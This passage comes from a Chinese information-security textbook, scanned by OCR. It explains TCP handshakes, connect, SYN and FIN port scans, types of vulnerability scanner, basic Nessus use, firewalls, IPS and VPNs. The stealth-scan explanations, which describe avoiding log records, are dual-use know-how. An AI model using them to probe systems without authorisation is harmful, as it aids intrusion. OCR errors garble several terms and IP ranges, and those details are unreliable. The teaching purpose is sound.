位 置 位 ， 同 时 它 也 提供 自己 的 序列 号 ， 这 个 做 法 类 似 于 说 :“OH， 亲 爱 的 ， 我 已 经 收 到 
了 你 的 号 码 ， 这 是 我 的 号 码 。” 

到 现在 为 止 ,发 起 连接 建立 请 求 的 计算 机 认为 连接 已 经 建立 起 来 ， 然 而 对 方 却 并 不 
这 样 认为 ， 对 方 还 要 等 到 它 自己 的 序列 号 有 了 应 答 后 才能 确认 连接 已 经 建立 起 来 。 因 此 
现在 的 状态 可 以 称 为 “ 半 连 接 ”。 如 果 发 起 连接 请 求 的 计算 机 不 对 收 到 的 序列 号 作出 应 答 ， 
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那么 这 个 连接 就 永远 也 建立 不 起 来 ， 而 正 因为 没有 建立 连接 ， 所 以 系统 也 不 会 对 这 次 连 
接 做 任何 记录 。 

握手 的 第 三 步 ， 发 起 连接 请 求 的 计算 机 对 收 到 的 序列 号 作出 应 答 ， 这 样 ， 两 台 计算 
机 之 间 的 连接 才 算 建立 起 来 。 

两 台 计 算 机 说 :“GOODYBYE” 时 的 握手 情况 与 此 类 似 : 当 一 台 计 算 机 没有 更 多 的 
数据 需要 发 送 了 ， 它 发 送 一 个 FIN 信号 (将 FIN 标记 位 置 位 ) 通知 另 一 端 ， 接 收 到 FIN 
的 另 一 端 计算 机 可 能 发 送 完 了 数据 ， 也 可 能 没 发 送 完 ， 但 它 会 对 此 作出 应 答 ， 而 当 它 真 
正 完成 所 有 需要 发 送 的 数据 后 ， 它 会 再 发 送 一 个 自己 的 FIN 信号， 等 对 方 对 此 作出 应 答 
后 ， 连 接 才 彻底 解除 。 

全 连接 扫描 是 TCP 端口 扫描 的 基础 , 现 有 的 全 连接 扫描 有 TCP connect0 扫 描 和 TCP 
反 向 ident 扫描 等 。 其 中 TCP connect0 扫 描 的 实现 原理 如 下 所 述 : 

扫描 主机 通过 TCP/IP 协议 的 三 次 握手 与 目标 主机 的 指定 端口 建立 一 次 完整 的 连接 。 
连接 由 系统 调用 connect 开始 。 如 果 端 口 开 放 ， 则 连接 将 建立 成 功 ， 否 则 ， 若 返回 -1 则 
表示 端口 关闭 。 建 立 连 接 成 功 : 响应 扫描 主机 的 SYNACK 连接 请 求 ， 这 一 响应 表明 日 
标 端口 处 于 监听 GIO 的 状态 。 如 果 目 标 端口 处 于 关闭 状态 ， 则 目标 主机 会 向 扫描 主 
机 发 送 RST 的 响应 。 

半 连 接 (SYN) 扫描 是 端口 扫描 没有 完成 一 个 完整 的 TCP 连接 ,在 扫描 主机 和 目标 
主机 的 一 指定 端口 建立 连接 时 候 只 完成 了 前 两 次 握手 ， 在 第 三 步 时 ， 扫 描 主 机 中 断 了 本 
次 连接 ， 使 连接 没有 完全 建立 起 来 ,这 样 的 端口 扫描 称 为 半 连 接 扫描 ,也 称 为 间接 扫描 。 
现 有 的 半 连 接 扫描 有 TCPSYN 扫描 和 IP ID 头 dumb 扫描 等 。 

SYN 扫描 的 优点 在 于 即使 日 志 中 对 扫描 有 所 记录 , 但 是 尝试 进行 连接 的 记录 也 要 比 
全 扫描 少 得 多 。 缺 点 是 在 大 部 分 操作 系统 下 , 发 送 主 机 需要 构造 适用 于 这 种 扫描 的 他 包 ， 
通常 情况 下 ， 构 造 SYN 数据 包 需 要 超级 用 户 或 者 授权 用 户 访问 专门 的 系统 调用 。 

FIN 秘密 扫描 就 是 向 它 的 目的 地 一 个 根本 不 存在 的 连接 发 送 FIN 信息 ， 如 果 这 项 服 
务 没 有 开 ， 那 么 目的 地 会 响应 一 条 错误 信息 ， 但 如 果 是 有 这 项 服务 ， 那 么 它 将 忽略 这 条 
人 信息。 这样， 扫描 者 的 问题 “你 运行 往 吗 ”就 有 了 答案 ， 而 且 还 不 会 在 系统 中 有 所 记录 。 

漏洞 扫描 技术 原理 : 漏洞 扫描 技术 主要 是 检查 目标 主机 是 否 存在 漏洞 。 它 主要 通过 
以 下 两 种 方法 来 检查 目标 主机 是 否 存在 漏洞 : 在 端口 扫描 后 得 知 目标 主机 开启 的 端口 以 
及 端口 上 的 网 络 服务 ， 将 这 些 相 关 信息 与 网 络 漏洞 扫描 系统 提供 的 漏洞 库 进行 匹配 ， 查 
看 是 否 有 满足 匹配 条 件 的 漏洞 存在 ;通过 模拟 黑客 的 攻击 手法 ， 对 目标 主机 系统 进行 攻 
击 性 的 安全 漏洞 扫描 ， 如 测试 弱势 口令 等 。 若 模拟 攻击 成 功 ， 则 表明 目标 主机 系统 存在 
安全 漏洞 。 

2. 网络 安全 漏洞 扫描 器 分 类 

漏洞 扫描 器 在 网 络 安全 的 发 展 中 出 现 了 各 种 各 样 的 版 本 ， 从 功能 单一 至 复杂 ， 从 本 
地 安全 探测 到 远程 的 安全 探测 。 一 般 地 ， 从 扫描 器 的 探测 功能 来 说 ， 可 以 分 为 以 下 几 类 ; 
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(1) 网 络 扫描 器 

网 络 漏洞 扫描 器 是 指 基 于 Internet 远程 检测 目标 网 络 和 主机 系统 漏洞 的 程序 
(Nessus, Satan 等 )， 如 提供 网 络 服务 、 后 门 程序 、 密 码 破解 和 阻 断 服务 等 的 扫描 测试 。 
它 是 一 种 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 ， 模 拟 攻击 者 对 目标 网 络 进行 攻击 
探测 ， 找 出 目标 存在 的 脆弱 点 。 网 络 扫描 器 针对 远程 主机 (网 络 ) 进 行 探测 ， 有 很 大 的 灵 
活性 ， 其 适用 性 广 。 通 过 使 用 漏洞 扫描 器 ， 网 络 管理 员 能 够 及 时 发 现 所 维护 的 服务 器 或 
主机 的 各 种 端口 的 分 配 情况 、 提 供 的 服务 、 服 务 软件 版 本 和 这 些 服务 及 软件 所 存在 的 安 
全 漏洞 ， 从 而 及 时 修补 漏洞 。 网 络 漏洞 扫描 通过 检测 目标 主机 TCP/IP 不 同 端口 的 服务 ， 
记录 目标 给 予 的 回答 。 通 过 这 种 方法 ， 可 以 搜集 到 很 多 目标 主机 的 各 种 信息 (如 是 否 能 用 
匿名 登录 ,是 否 有 可 写 的 FTP 目录 ,是 否 能 用 Telnet 等 )。 在 获得 日 标 主机 TCP/IP 端 
口 和 其 对 应 的 网 络 访问 服务 的 相关 信息 后 ,与 网 络 漏洞 扫描 系统 提供 的 漏洞 库 进行 匹配 ， 
如 果 满 足 匹 配 条 件 ， 则 视 为 漏洞 存在 。 在 匹配 上 ， 网 络 漏洞 扫描 器 一 般 采 用 基于 规则 的 
匹配 技术 。 即 根据 安全 专家 对 网 络 系统 安全 漏洞 、 黑 客 攻击 案例 的 分 析 和 系统 管理 员 关 
于 网 络 系统 安全 配置 的 实际 经 验 ， 形 成 一 套 标 准 的 系统 漏洞 库 ， 然 后 在 此 基础 上 构成 相 
应 的 匹配 规则 ， 由 程序 自动 进行 系统 漏洞 扫描 的 分 析 工 作 。 此 外 ， 通 过 模拟 黑客 攻击 的 
手法 ， 对 目标 主机 系统 进行 攻击 性 的 安全 漏洞 扫描 ， 如 测试 弱势 口令 等 ， 也 是 扫描 模块 
的 实现 方法 之 一 。 此 方法 通过 使 用 插件 进行 模拟 攻击 ， 如 果 模 拟 攻击 成 功 ， 则 视 为 漏洞 
存在 。 一 般 插件 是 由 脚本 语言 编写 的 子 程序 , 扫描 程序 可 以 通过 调用 它 来 执行 漏洞 扫描 ， 
检测 出 系统 中 存在 的 漏洞 。 用 户 可 以 随时 下 载 最 新 的 插件 以 检测 出 更 多 的 漏洞 ， 甚 至 还 
可 根据 需要 自己 编写 插件 以 扩充 漏洞 扫描 软件 的 功能 。 

(2) 主机 扫描 器 

主机 扫描 器 针对 本 地 主机 ， 以 本 地 主机 作为 探测 目标 ， 找 出 本 地 主机 的 脆弱 点 ， 以 
防止 被 攻击 者 利用 。 主 机 漏洞 扫描 器 是 指针 对 操作 系统 内 部 进行 的 扫描 ， 如 Unix, NT, 
Linux 系统 日 志文 件 分 析 ， 可 以 弥补 网 络 型 安全 漏洞 扫描 器 只 从 外 面 通 过 网 络 检查 系统 
安全 的 不 足 。 一 般 采 用 Client/Server 的 架构 ， 有 一 个 统一 控 管 的 主 控 台 (Console) 和 分 
布 于 各 重要 操作 系统 的 Agents, hH Console 端 下 达 命 令 给 Agents 进行 扫描 ， 各 
Agents 再 回报 给 Console 扫描 的 结果 ， 最 后 由 Console 端 呈 现 出 安全 漏洞 报表 。 主 机 
扫描 器 需要 与 本 地 操作 系统 的 版 本 相 适 应 ， 对 本 地 主机 可 以 进行 高 准确 性 的 探测 ， 可 以 
探测 出 详细 的 安全 补丁 情况 ， 存 在 脆弱 点 的 服务 以 及 口令 和 其 他 一 些 关 于 服务 的 配置 
信息 。 

(3) 服务 扫描 器 

服务 扫描 器 则 是 探测 目标 主机 开放 端口 来 分 析 目 标 可 能 运行 的 服务 ， 并 以 此 为 依据 
检测 可 能 被 利用 的 攻击 入 口 等 。 

(4) 数据 库 扫 描 器 

数据 库 扫描 器 是 专门 针对 数据 库 的 弱点 探测 工具 ， 主 要 从 数据 库 的 认证 、 授 权 、 系 
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统 集 成 、 基 线 比 较 等 方面 进行 分 析 。 

(5) 专用 扫描 器 (CGIscanner、ASPscanner、 远 程控 制 系统 扫描 器 、 操 作 系统 辨识 
扫描 器 、nNSSeanner)。 

专用 扫描 器 是 专门 针对 某 一 漏洞 或 者 服务 相关 信息 收集 的 扫描 器 ,如 CGI 扫 描 、ASP 
等 脚本 的 扫描 、 操 作 系 统 识 别 扫 描 等 功能 比较 专业 的 扫描 器 。 

3. 网 络 安全 漏洞 扫描 器 应 用 

采用 漏洞 扫描 工具 仅 是 防范 系统 入 侵 保障 系统 安全 的 第 一 步 。 如 何 选 择 满 足 您 自己 
需要 的 合适 的 扫描 工具 同样 也 很 重要 。 一 般 情 况 下 可 以 从 以 下 几 个 方面 进行 分 机， 对 漏 
洞 扫 描 工 具 进行 选择 : 

(1) 底层 技术 

比较 漏洞 扫描 工具 ， 第 一 是 比较 其 底层 技术 。 你 需要 的 是 主动 扫描 ， 还 是 被 动 扫描 ; 
是 基于 主机 的 扫描 ， 还 是 基于 网 络 的 扫描 等 。 一 些 扫描 工具 是 基于 Internet 的 、 用 来 管 
理 和 集合 的 服务 器 程序 ， 运 行 在 软件 供应 商 的 服务 器 上 ， 而 不 是 在 客户 自己 的 机 器 上 。 
这 种 方式 的 优点 在 于 检测 方式 能 够 保证 经 常 更 新 ， 缺 点 在 于 需要 依赖 软件 供应 商 的 服务 
器 来 完成 扫描 工作 。 

扫描 过 程 可 以 分 为 “被 动 ” 和 “主动 ”两 大 类 。 被 动 扫描 不 会 产生 网 络 流量 包 ， 不 
会 导致 目标 系统 崩溃 ， 被 动 扫描 工具 对 正常 的 网 络 流量 进行 分 析 ， 可 以 设计 成 “永远 在 
线 ” 检 测 的 方式 。 与 主动 扫描 工具 相 比 , 被 动 扫描 工具 的 工作 方式 , 与 网 络 监 控 器 或 IDS 
类 似 。 主 动 扫 描 工具 更 多 地 带 有 “入 侵 ” 的 意图 ， 可 能 会 影响 网 络 和 目标 系统 的 正常 操 
作 。 它 们 并 不 是 持续 不 断 运行 的 ， 通 常 是 隔 一 段 时 间 检 测 一 次 。 基 于 主机 的 扫描 工具 需 
要 在 每 台 主 机 上 安装 代理 (Agent) 软件 ;而 基于 网 络 的 扫描 工具 则 不 需要 。 基 于 网 络 的 
扫描 工具 因为 要 占用 较 多 资源 ， 一 般 需要 一 台 专 门 的 计算 机 。 如 果 网 络 环境 中 含有 多 种 
操作 系统 ， 还 需要 看 看 扫描 其 是 否 兼容 这 些 不 同 的 操作 系统 〈 比 如 Microsoft, Unix 以 
及 Netware 等 )。 

(2) 管理 员 所 关心 的 一 些 特性 

通常 ， 漏 洞 扫描 工具 完成 的 功能 : 扫描 、 生 成 报告 、 分 析 并 提出 建议 ， 以 及 数据 管 
理 。 在 许多 方面 ， 扫 描 是 最 常见 的 功能 ， 但 是 信息 管理 和 扫描 结果 分 析 的 准确 性 同样 很 
重要 。 另 外 要 考虑 的 是 通知 方式 : 当 发 现 漏 洞 后 ， 扫 描 工 具 是 否 会 向 管理 员 报 警 ， 采 用 
什么 方式 报警 。 通 常 管理 员 从 以 下 几 个 方面 来 进行 考虑 : © 报表 性 能 好 ; @ 易 安 装 ， 
易 使 用 ; @ 能 够 检测 出 缺少 哪些 补丁 ; @ 扫描 性 能 好 , 具备 快速 修复 漏洞 的 能 力 ; © 对 
漏洞 及 漏洞 等 级 检测 的 可 靠 性 ，@ 可 扩展 性 ，@ 易 升 级 性 ; 性 价 比 好 。 

G) 漏洞 库 

只 有 漏洞 库 中 存在 相关 信息 ， 扫 描 工具 才能 检测 到 漏洞 ， 因 此 ， 漏 洞 库 的 数量 决定 
了 扫描 工具 能 够 检测 的 范围 。 然 而 ， 数 量 并 不 意味 着 一 切 ， 真 正 的 检验 标准 在 于 扫描 工 
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有 具 能 否 检测 出 最 常见 的 漏洞 。 最 根本 的 在 于 ， 扫 描 工 具 能 和 否 检测 出 影响 您 的 系统 的 那些 
漏洞 。 扫 描 工具 中 有 用 的 漏洞 库 数 量 取决 于 你 的 网 络 设备 和 系统 的 类 型 。 你 使 用 扫描 工 
具 的 目的 是 利用 它 来 检测 您 的 特定 环境 中 的 漏洞 。 例如 你 有 很 多 Netware 服务 器 ， 那么 
不 含 Netware 漏洞 库 的 扫描 工具 就 不 是 你 的 最 佳 选择 。 当 然 , 漏洞 库 中 的 攻击 特性 必须 
经 常 升级 ， 这 样 才能 检测 到 最 近 发 现 的 安全 漏洞 。 

(4) 易 使 用 性 

不 同 的 扫描 工具 软件 ， 界面 也 各 式 各 样 ， 从 简单 的 基于 文本 的 , 到 复杂 的 图 形 界面 ， 
以 及 Web 界面 。 一 个 难以 理解 和 使 用 的 界面 ， 会 阻碍 管理 员 使 用 这 些 工具 ， 因 此 ， 界 
面 易 操作 性 尤为 重要 。 

(5) 扫描 报告 

对 管理 员 来 说 ， 扫 描 报告 的 功能 越 来 越 重要 ， 在 一 个 面向 文档 的 商务 环境 中 ， 你 不 
但 要 能 够 完成 你 的 工作 ， 而 且 还 需要 提供 书面 资料 说 明 你 是 怎样 完成 的 。 事 实 上 ， 一 个 
扫描 可 能 会 得 到 几 百 甚 至 几 千 个 结果 ， 但 是 这 些 数据 是 没 用 的 ， 除 非 经 过 整理 ， 转 换 成 
可 以 为 人 们 理解 的 信息 。 这 就 意味 着 理想 情况 下 ， 扫 描 工 具 应 该 能 够 对 这 些 数据 进行 分 
类 和 交叉 引用 ,可 以 导入 其 他 程序 中 , 或 者 转换 成 其 他 格式 (比如 CSV, HTML, XML, 
MHT, MDB, EXCEL 以 及 Lotus 等 等 )， 采 用 不 同方 式 来 展现 它 ， 并 且 能 够 很 容易 的 
与 以 前 的 扫描 结果 做 比较 。 发 现 系统 漏洞 ， 只 是 完成 了 一 半 工 作 。 一 个 完整 的 方案 ， 同 
时 将 告诉 你 针对 这 些 漏洞 将 采取 哪些 措施 。 一 个 好 的 漏洞 扫描 工具 会 对 扫描 结果 进行 分 
析 ， 并 提供 修复 建议 。 一 些 扫描 工具 将 这 些 修复 建议 整合 在 报告 中 ， 另 外 一 些 则 提供 产 
癌 网 站 或 其 他 在 线 资源 的 链接 。 漏 洞 修复 工具 ， 它 可 以 和 流行 的 扫描 工具 结合 在 一 起 使 
用 ， 对 扫描 结果 进行 汇总 ， 并 自动 完成 修复 过 程 。 

(6) 分 析 的 准确 性 

只 有 当 报 告 的 结果 是 精确 的 ， 提 供 的 修复 建议 是 有 效 的 ， 一 份 包含 了 详细 漏洞 修复 
建议 的 报告 ， 才 算是 一 份 优 秀 的 报告 。 一 个 好 的 扫描 工具 必须 具有 很 低 的 误 报 率 和 漏 
报 率 。 

(7) 安全 问题 
因 扫 描 工 具 而 造成 的 网 络 瘫痪 所 引起 的 经 济 损失 和 真实 攻击 造成 的 损失 是 一 样 的 ， 
都 非常 巨大 。 一 些 扫描 工具 在 发 现 漏 洞 后 ， 会 尝试 进一步 利用 这 些 漏 洞 ， 这 样 能 够 确保 
这 些 漏 洞 是 真实 存在 的 ， 进 而 消除 误 报 的 可 能 性 。 但 是 ， 这 种 方式 容易 出 现 难以 预料 的 
情况 。 在 使 用 具备 这 种 功能 的 扫描 工具 的 时 候 ， 需 要 格外 小 心 ， 最 好 不 要 将 其 设置 成 自 
动 运行 状态 。 扫 描 工 具 可 能 造成 网 络 失效 的 另 一 种 原因 是 扫描 过 程 中 ， 超 负荷 的 数据 包 
流量 造成 拒绝 服务 (DOS, Denial Of Service)。 为 了 防止 这 一 点 ， 需 要 选择 好 适当 的 扫 
描 设 置 。 相 关 的 设置 项 有 : 并 发 的 线程 数 、 数 据 包 间隔 时 间 、 扫 描 对 象 总 数 等 ， 这 些 项 
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应 该 能 够 调整 ， 以 便 使 网 络 的 影响 降 到 最 低 。 一 些 扫描 工具 还 提供 了 “安全 扫描 ”的 模 
板 ， 以 防止 造成 对 目标 系统 的 损耗 。 

(8) 性 能 

扫描 工具 运行 的 时 候 ， 将 占用 大 量 的 网 络 带宽 ， 因 此 ， 扫 描 过 程 应 尽快 完成 。 当 然 ， 
漏洞 库 中 的 漏洞 数 越 多 ， 选 择 的 扫描 模式 越 复杂 ， 扫 描 所 耗 时 间 就 越 长 ， 因 此 这 只 是 个 
相对 的 数值 。 提 高 性 能 的 一 种 方式 是 在 企业 网 中 部 署 多 个 扫描 工具 ， 将 扫描 结果 反馈 到 
一 个 系统 中 ， 对 扫描 结果 进行 汇总 。 

Nessus 服务 器 的 测试 使 用 

首先 启动 Nessus 服务 器 nessusd 程序 , 进入 nessusd 所 在 目录 , 并 执行 如 下 命令 ; 

nessusd—D 

启动 服务 器 程序 时 可 以 在 启动 命令 后 加 上 一 些 启动 参数 ， 有 具体 参数 如 下 所 述 ， 

-D, --background /在 后 台 运 行 nessusd 服务 # 

c, --config-file /使 用 另外 一 个 配置 文件 

a，--listen /只 监听 来 自 指定 IP 地 址 的 连接 请 求 

如 nessusd-a 202.113.13.10, nessusd 将 只 接收 来 自 于 202.113.13.10 的 通信 请 求 ， 
这 个 参数 可 以 指定 允许 连接 的 客户 端 地 址 ， 防 止 来 自 其 他 机 器 的 使 用 。 


p, --port= /使 nessusd 只 在 指定 的 TCP 端口 上 监听 ， 默 认 的 监听 端口 是 3001。 
v, --version /显示 版 本 号 并 退出 程序 
h，--help /显示 所 有 命令 


d，--dump-cfg /显示 当前 的 配置 

服务 器 启动 后 便 可 以 按 提示 登录 到 nessus 服务 器 了 。 首先 , 输入 命令 /usr/bin/nessus 
久 ， 随 后 会 启动 如 图 6-65 所 示 界 面 。 在 Nessus Host 框 中 输入 Nessus 服务 器 所 在 主机 
的 IP 地 址 ， 端 口号 使 用 默认 值 。 然 后 ， 在 Login 框 和 Password 框 中 分 别 输入 用 户 名 
和 密码 ， 并 单 击 Log in 按钮 登录 到 服务 器 。 

登录 成 功 后 单 击 Plugins 标签 ， 选 择 相应 插件 。 页 面 上 半 部 分 是 插件 选择 ， 下 半 部 
分 是 插件 所 能 检查 的 攻击 方法 。 然 后 ， 单 击 进 入 Target 标签 选择 需要 扫描 的 目标 主机 。 
在 输入 框 中 输入 目标 地 址 ， 例 如 我 们 现在 要 对 Nessus 服务 器 进行 扫描 输入 127.0.0.1。 
同时 ， 如 果 我 们 需要 对 某 一 网 段 进 行 扫描 便 可 以 输入 202.113.13.1/24 指定 扫描 
202.113.12.1 一 202.113.13.255 整个 网 段 ， 如 果 我 们 需要 对 某 一 范围 内 的 IP 主机 进行 扫 
描 便 可 以 输入 202.113.13.1 一 202.113.115.208 对 此 地 址 范围 内 的 所 有 主机 进行 扫描 。 

一 切 设置 好 后 ， 便 可 以 单 击 start 按钮 开始 对 目标 主机 扫描 。 扫 描 结束 后 窗口 中 会 
列 出 所 有 被 扫描 主机 ， 单 击 主机 名 称 便 可 以 显示 出 相应 扫描 报告 。 我 们 还 可 以 根据 需要 
将 扫描 报告 保存 为 多 种 格式 。 
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host [Plugins [Credentials [Scan Options [Target [User [Prefs [KB [Credis] 
New session setup 
8 Nessusd Host : |localhost 
Port : |1241 
B Login : [root 
Password : | 
Start the scan | | Load report | | Quit 


图 6-65 Nessus 登录 界面 


4. 网 络 安全 漏洞 的 防御 

采用 网 络 防火 墙 抵御 由 于 网 络 内 存在 的 安全 漏洞 而 存在 的 潜在 网 络 攻击 ， 通 过 防火 
墙 过 滤 不 安全 的 服务 而 降低 风险 。 由 于 只 有 经 过 精心 选择 的 应 用 协议 才能 通过 防火 墙 ， 
所 以 网 络 环境 变 得 更 安全 。 如 防火 墙 可 以 禁止 诸如 众所周知 的 不 安全 的 NFS 协议 进出 受 
保护 网 络 ， 这 样 外 部 的 攻击 者 就 不 可 能 利用 这 些 脆弱 的 协议 来 攻击 内 部 网 络 。 防 火 墙 同 
时 可 以 保护 网 络 免 受 基于 路 由 的 攻击 , 如 下 选项 中 的 源 路 由 攻击 和 ICMP 重 定向 中 的 重 
定向 路 径 。 防 火 墙 应 该 可 以 拒绝 所 有 以 上 类 型 攻击 的 报 文 并 通知 防火 墙 管理 员 。 具 体 可 
以 体现 在 以 下 方面 : 

(1) 强化 网 络 安 全 策略 

通过 以 防火 墙 为 中 心 的 安全 方案 配置 ， 能 将 所 有 安全 软件 (如 口令 、 加 密 、 身 份 认 
证 、 审 计 等 ) 配置 在 防火 墙 上 。 与 将 网 络 安全 问题 分 散 到 各 个 主机 上 相 比 ， 防 火 墙 的 集 
中 安全 管理 更 经 济 。 例 如 在 网 络 访问 时 ， 一 次 一 密 口 令 系 统 和 其 他 的 身份 认证 系统 完全 
可 以 不 必 分 散在 各 个 主机 上 , 而 集中 在 防火 墙 一 身上 。(D 服务 访问 策略 。 服 务 访问 策略 
是 高 层 的 策略 ， 明 确定 义 了 受 保护 网 络 允许 和 拒绝 的 网 络 服 务 及 其 使 用 范围 ， 以 及 安全 


国医 


A 


信息 安全 工程 师 教程 


措施 (如 认证 等 ) 。 两 种 典型 的 服务 访问 策略 是 : 不 允许 外 部 网 络 访问 内 部 网 络 ， 但 允 
许 内 部 网 络 访问 外 部 网 络 ， 人 允许 外 部 网 络 访问 部 分 内 部 网 络 服务 。@) 防火 墙 设 计策 略 。 
防火 墙 设计 策略 是 低层 的 策略 ， 描 述 了 防火 墙 如 何 根据 高 层 服务 访问 策略 来 具体 地 限制 
访问 和 过 滤 服 务 等 ， 即 它 必须 针对 具体 的 防火 墙 来 定义 过 滤 规 则 等 ， 以 实现 服务 访问 策 
略 。 在 设计 该 策略 前 ， 设 计 者 应 先 从 两 个 防火 墙 设计 的 基本 策略 中 选择 其 一 ， 并 根据 它 
和 服务 访问 策略 以 及 经 费 来 选择 合适 的 防火 墙 系统 结构 和 组 件 。 这 两 个 基本 防火 墙 设计 
策略 是 : 允许 所 有 除 明 确 拒 绝 之 外 的 通信 或 服务 ;拒绝 所 有 除 明确 允许 之 外 的 通信 或 
服务 。 

(2) 监控 审计 

如 果 所 有 的 访问 都 经 过 防火 墙 , 那么 , 防火 墙 就 能 记录 下 这 些 访问 并 作出 日 志 记录 ， 
同时 也 能 提供 网 络 使 用 情况 的 统计 数据 。 当 发 生 可 疑 动作 时 , 防火 墙 能 进行 适当 的 报警 ， 
并 提供 网 络 是 否 受到 监测 和 攻击 的 详细 信息 。 另 外 ， 收 集 一 个 网 络 的 使 用 和 误 用 情况 也 
是 非常 重要 的 。 首 先 的 理由 是 可 以 清楚 防火 墙 是 否 能 够 抵挡 攻击 者 的 探测 和 攻击 ， 并 且 
清楚 防火 墙 的 控制 是 否 充足 。 而 网 络 使 用 统计 对 网 络 需求 分 析 和 威胁 分 析 等 而 言 也 是 非 
常 重要 的 。 

G) 防止 内 部 信息 泄露 

通过 利用 防火 墙 对 内 部 网 络 的 划分 ， 可 实现 内 部 网 重点 网 段 的 隔离 ， 从 而 限制 了 局 
部 重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 再 者 ， 隐 私 是 内 部 网 络 非常 关心 的 
问题 ， 一 个 内 部 网 络 中 不 引 人 和 人 注意 的 细节 可 能 包含 了 有 关 安 全 的 线索 而 引起 外 部 攻击 者 
的 兴趣 ， 甚 至 因此 而 暴露 了 内 部 网 络 的 某 些 安全 漏洞 。 使 用 防火 墙 就 可 以 隐蔽 那些 透漏 
内 部 细节 如 Finger, DNS 等 服务 。Finger 显示 了 主机 的 所 有 用 户 的 注册 名 、 真 名 ， 最 后 
登录 时 间 和 使 用 shell 类 型 等 。 但 是 Finger 显示 的 信息 非常 容易 被 攻击 者 所 获悉 。 攻 击 者 
可 以 知道 一 个 系统 使 用 的 频繁 程度 ， 这 个 系统 是 否 有 用 户 正在 连 线 上 网 ， 这 个 系统 是 否 
在 被 攻击 时 引起 注意 等 等 。 防 火 墙 可 以 同样 阻塞 有 关内 部 网 络 中 的 DNS 信息 ， 这 样 一 
台 主 机 的 域名 和 IP 地 址 就 不 会 被 外 界 所 了 解 。 

(4) 数据 包 过 滤 

网 络 上 的 数据 都 是 以 包 为 单位 进行 传输 的 ， 每 一 个 数据 包 中 都 会 包含 一 些 特定 的 信 
息 ， 如 数据 的 源 地 址 、 目 标 地 址 、 源 端口 号 和 目标 端口 号 等 。 防 火 墙 通过 读 取 数 据 包 中 
的 地 址 信息 来 判断 这 些 包 是 否 来 自 可 信任 的 网 络 ， 并 与 预先 设 定 的 访问 控制 规则 进行 比 
较 ， 进 而 确定 是 否 需 对 数据 包 进 行 处 理 和 操作 。 数 据 包 过 滤 可 以 防止 外 部 不 合法 用 户 对 
内 部 网 络 的 访问 ， 但 由 于 不 能 检测 数据 包 的 具体 内 容 ， 所 以 不 能 识别 具有 非法 内 容 的 数 
据 包 ， 无 法 实施 对 应 用 层 协 议 的 安全 处 理 。 

(5) 网 络 地 址 转换 

网 络 IP 地 址 转换 是 一 种 将 私有 IP 地 址 转化 为 公 网 IP 地 址 的 技术 , 它 被 广泛 应 用 于 
各 种 类 型 的 网 络 和 互联 网 的 接 入 中 。 网 络 IP 地 址 转换 一 方面 可 隐藏 内 部 网 络 的 真实 IP 
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地 址 ,使 内 部 网 络 免 受 黑客 的 直接 攻击 ， 另 一 方面 由 于 内 部 网 络 使 用 了 私有 了 P 地 址 ， 从 
而 有 效 解决 了 公 网 IP 地 址 不 足 的 问题 。 

(6) 虚拟 专用 网 络 

除了 安全 作用 ， 防 火 墙 还 支持 具有 Internet 服务 特性 的 企业 内 部 网 络 技术 体系 VPN 
(虚拟 专用 网 ) 。 虚 拟 专 用 网 络 将 分 布 在 不 同 地 域 上 的 局 域 网 或 计算 机 通过 加 密 通 信 ， 虚 
拟 出 专用 的 传输 通道 ， 从 而 将 它们 从 逻辑 上 连 成 一 个 整体 ， 不 仅 省 去 了 建设 专用 通信 线 
路 的 费用 ， 还 有 效 地 保证 了 网 络 通信 的 安全 。 

防火 墙 是 实施 访问 控制 策略 的 系统 ， 对 流 经 的 网 络 流量 进行 检查 ， 拦 截 不 符合 安全 
策略 的 数据 包 。 入 侵 检测 技术 (IDS) 通 过 监视 网 络 或 系统 资源 ， 寻 找 违反 安全 策略 的 行为 
或 攻击 迹象 ， 并 发 出 报警 。 传 统 的 防火 墙 骨 在 拒绝 那些 明显 可 疑 的 网 络 流量 ， 但 仍然 允 
许 某 些 流量 通过 ， 因 此 防火 墙 对 于 很 多 入 侵 攻 击 仍然 无 计 可 施 。 绝 大 多 数 IDS 系统 都 
是 被 动 的， 而 不 是 主动 的 。 也 就 是 说 ， 在 攻击 实际 发 生 之 前 ， 它 们 往往 无 法 预先 发 出 警 
报 。 而 入 侵 防 护 系统 (IPS) 则 倾向 于 提供 主动 防护 ， 其 设计 宗旨 是 预先 对 入 侵 活 动 和 攻 
击 性 网 络 流量 进行 拦截 ， 避 免 其 造成 损失 ， 而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 
发 出 警报 。IPS 是 通过 直接 嵌入 到 网 络 流量 中 实现 这 一 功能 的 ， 即 通过 一 个 网 络 端口 接 
收 来 自 外 部 系统 的 流量 ， 经 过 检查 确认 其 中 不 包含 异常 活动 或 可 疑 内 容 后 ， 再 通过 另外 
一 个 端口 将 它 传送 到 内 部 系统 中 。 这 样 一 来 ， 有 问题 的 数据 包 ， 以 及 所 有 来 自 同一 数据 
流 的 后 续 数据 包 ， 都 能 在 IPS 设备 中 被 清除 掉 。 
6.4.2 VPN 技术 及 应 用 


VPN 被 定义 为 通过 一 个 公用 网 络 (通常 是 因特网 ) 建立 一 个 临时 的 、 安 全 的 连接 ， 
是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 定 的 隧道 。VPN 是 企业 网 在 因特网 等 公共 网 络 
上 的 延伸 ， 它 可 以 帮助 远程 用 户 、 公 司 分 支 机构 、 商 业 伙 伴 及 供应 商 同 公司 的 内 部 网 建 
立 可 信 的 安全 连接 ， 并 保证 数据 的 安全 传输 。 通 过 将 数据 流转 移 到 低 成 本 的 网 络 上 ， 一 
个 企业 的 虚拟 专用 网 解决 方案 将 大 幅度 地 减少 用 户 花 费 在 城 域 网 和 远程 网 络 连接 上 的 费 
用 。 同 时 ， 企 业 不 必 投 入 大 量 的 人 力 和 物力 去 安装 和 维护 WAN 设备 和 远程 访问 设备 ， 
这 些 工作 都 可 以 托管 给 ISP (nternet Service Provider， 互 联网 服务 提供 商 ) ， 从 而 简化 
了 网 络 的 设计 、 管 理 ， 提 高 了 网 络 的 随意 扩展 性 。 另 外 ，VPN 使 用 户 具 有 完全 控制 主 
动 权 , 用 户 可 以 利用 ISP 的 设施 和 服务 , 同时 又 完全 掌握 着 自己 网 络 的 控制 权 。 比方 说 ， 
用 户 可 以 把 拨号 访问 交 给 ISP 去 做 ， 由 自己 负责 用 户 的 查验 、 访问 权 、 网 络 地 址 、 安 全 
